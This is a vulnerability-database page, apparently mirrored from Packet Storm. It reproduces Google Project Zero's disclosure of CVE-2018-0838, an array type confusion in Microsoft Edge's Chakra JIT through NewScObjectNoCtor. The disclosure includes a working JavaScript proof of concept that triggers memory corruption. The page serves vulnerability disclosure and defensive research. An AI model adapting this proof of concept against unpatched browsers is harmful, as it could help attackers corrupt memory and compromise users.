Lucene search

K

Microsoft Edge Chakra JIT NewScObjectNoCtor Array Type Confusion

🗓️ 15 Feb 2018 00:00:00Reported by Google Security ResearchType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 40 Views

Microsoft Edge Chakra JIT Array Type Confusion via NewScObjectNoCto

Show more
Related
Code
ReporterTitlePublishedViews
Family
Symantec
Microsoft Edge Scripting Engine CVE-2018-0838 Remote Memory Corruption Vulnerability
13 Feb 201800:00
–symantec
0day.today
Microsoft Edge Chakra JIT - NewScObjectNoCtor Array Type Confusion Exploit
15 Feb 201800:00
–zdt
Check Point Advisories
Microsoft Edge Scripting Engine Memory Corruption (CVE-2018-0838)
13 Feb 201800:00
–checkpoint_advisories
Microsoft CVE
Scripting Engine Memory Corruption Vulnerability
13 Feb 201808:00
–mscve
CVE
CVE-2018-0838
15 Feb 201802:29
–cve
CVE
CVE-2018-0858
15 Feb 201802:29
–cve
CVE
CVE-2018-0836
15 Feb 201802:29
–cve
CVE
CVE-2018-0837
15 Feb 201802:29
–cve
CVE
CVE-2018-0859
15 Feb 201802:29
–cve
CVE
CVE-2018-0861
15 Feb 201802:29
–cve
Rows per page
`Microsoft Edge: Chakra: JIT: Array type confusion via NewScObjectNoCtor   
  
CVE-2018-0838  
  
  
This is similar to the previous issues 1457, <a href="/p/project-zero/issues/detail?id=1459" title="Microsoft Edge: Chakra: JIT: Array type confusion via Array.prototype.reverse" class="closed_ref" rel="nofollow"> 1459 </a>(MSRC 42551, MSRC 42552).  
  
If a JavaScript function is used as a consturctor, it sets the new object's "__proto__" to its "prototype". The JIT compiler uses NewScObjectNoCtor instructions which are not checked by CheckJsArrayKills.  
  
PoC:  
function inlinee() {  
  
}  
  
function opt(arr) {  
arr[0] = 1.1;  
new inlinee();  
arr[0] = 2.3023e-320;  
}  
  
function main() {  
let arr = [1.1];  
for (let i = 0; i < 10000; i++) {  
inlinee.prototype = {};  
opt(arr);  
}  
  
inlinee.prototype = arr;  
opt(arr);  
  
print(arr);  
}  
  
main();  
  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: lokihardt  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo